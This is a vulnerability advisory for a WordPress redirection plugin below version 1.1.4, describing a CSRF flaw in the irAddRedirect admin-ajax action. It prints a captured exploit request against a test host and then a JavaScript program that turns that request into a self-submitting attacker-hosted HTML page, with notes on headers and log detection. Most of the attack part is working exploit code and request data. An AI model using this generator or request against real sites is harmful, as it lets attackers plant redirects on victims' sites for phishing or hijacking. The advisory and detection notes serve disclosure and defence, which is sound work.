Redirection < 1.1.4 - Redirect Creation via CSRF

WPEX-ID: DE4CFF6D-0030-40E6-8221-FEF56E12B4DE
Type: wpexploit
Author: Mohamed Selim
Published: Mar 10, 2023
Tags: redirection vulnerability, csrf
Tested host: sawcup.s2-tastewp.com

EPSS: 0.001 (percentile 33.2%)

The plugin does not perform nonce verification when a redirect is added through the irAddRedirect admin-ajax action, so an attacker who lures a logged-in user who is allowed to manage the plugin's redirects onto a page they control can create arbitrary redirects on the victim's site via a CSRF attack. The request below was captured from a legitimate same-origin session (Cookie: test=test stands in for the victim's real session cookie, and the Origin, Referer and Sec-Fetch-Site values are those of a same-origin request); in an attack the same body is submitted cross-site from the attacker's page, with the victim's browser attaching the session cookie.

````
POST /wp-admin/admin-ajax.php HTTP/2
Host: sawcup.s2-tastewp.com
Cookie: test=test;
User-Agent: useragent
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sawcup.s2-tastewp.com/wp-admin/admin.php?page=irrp-redirection
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://sawcup.s2-tastewp.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

action=irAddRedirect&id=0&from=https%3a%2f%2fsawcup.s2-tastewp.com%2ftest&to=https%3a%2f%2fexample.com%2f&selected=&redirectionType=redirection
````
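The following is an added example, not code from the advisory, the author or the plugin. It converts the captured admin-ajax.php request into the attacker-hosted HTML page a CSRF attack against a nonce-less endpoint would use, and lists the captured headers that a plain cross-site form cannot reproduce. The host, action and parameters are taken from the PoC above; the page layout, the header classification and the function names are this example's own assumptions.

```javascript
// Added example (not from the advisory): build a self-submitting cross-site
// form from the captured irAddRedirect request, and flag captured headers a
// plain HTML form cannot send. Target and body are copied from the PoC.
const TARGET = 'https://sawcup.s2-tastewp.com/wp-admin/admin-ajax.php';

const CAPTURED_BODY =
  'action=irAddRedirect&id=0&from=https%3a%2f%2fsawcup.s2-tastewp.com%2ftest' +
  '&to=https%3a%2f%2fexample.com%2f&selected=&redirectionType=redirection';

// Headers from the capture (Cookie value is the advisory's placeholder).
const CAPTURED_HEADERS = {
  'Host': 'sawcup.s2-tastewp.com',
  'Cookie': 'test=test;',
  'User-Agent': 'useragent',
  'Accept': '*/*',
  'Accept-Language': 'en-US,en;q=0.5',
  'Accept-Encoding': 'gzip, deflate',
  'Referer': 'https://sawcup.s2-tastewp.com/wp-admin/admin.php?page=irrp-redirection',
  'X-Requested-With': 'XMLHttpRequest',
  'Content-Type': 'application/x-www-form-urlencoded',
  'Content-Length': '143',
  'Origin': 'https://sawcup.s2-tastewp.com',
  'Sec-Fetch-Dest': 'empty',
  'Sec-Fetch-Mode': 'cors',
  'Sec-Fetch-Site': 'same-origin',
  'Te': 'trailers',
};

// Decode application/x-www-form-urlencoded as a browser does
// (percent-decoding, '+' as space) into a plain name -> value object.
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Escape a value for use inside an HTML attribute or text node.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Headers the browser fills in itself on a form submission; a <form> can
// additionally pick only these content types. Anything else in the capture
// cannot be reproduced by a form-based CSRF page, so if the handler requires
// it the form PoC fails and that must be checked before reporting.
const BROWSER_SET_HEADERS = new Set([
  'host', 'cookie', 'user-agent', 'accept', 'accept-language',
  'accept-encoding', 'referer', 'origin', 'content-length', 'connection', 'te',
]);
const FORM_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain',
]);

function headersFormCannotSend(headers) {
  const blocked = [];
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (BROWSER_SET_HEADERS.has(lower) || lower.startsWith('sec-')) continue;
    if (lower === 'content-type') {
      const mime = value.split(';')[0].trim().toLowerCase();
      if (FORM_CONTENT_TYPES.has(mime)) continue;
    }
    blocked.push(name);
  }
  return blocked;
}

// Attacker-hosted page: one hidden input per captured parameter, submitted
// automatically when the victim's browser loads it.
function buildCsrfPage(target, params) {
  const inputs = Object.entries(params)
    .map(([k, v]) => `    <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('\n');
  return [
    '<!doctype html>',
    '<html><body>',
    `  <form id="csrf" method="POST" action="${escapeHtml(target)}">`,
    inputs,
    '  </form>',
    '  <script>document.getElementById("csrf").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Usage: node csrf-poc.js > poc.html
process.stdout.write(buildCsrfPage(TARGET, parseFormBody(CAPTURED_BODY)) + '\n');
```

For this capture the only header a form cannot send is X-Requested-With; the page works as a PoC only if the handler does not gate on it, which is what a tester should confirm against the target. When the generated page is served from the attacker's origin, the victim's browser sends Origin set to that site and Sec-Fetch-Site: cross-site, which is also the signal to look for when hunting this pattern in web-server logs. Whether the session cookie is attached at all depends on the browser's SameSite handling of the WordPress login cookie.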
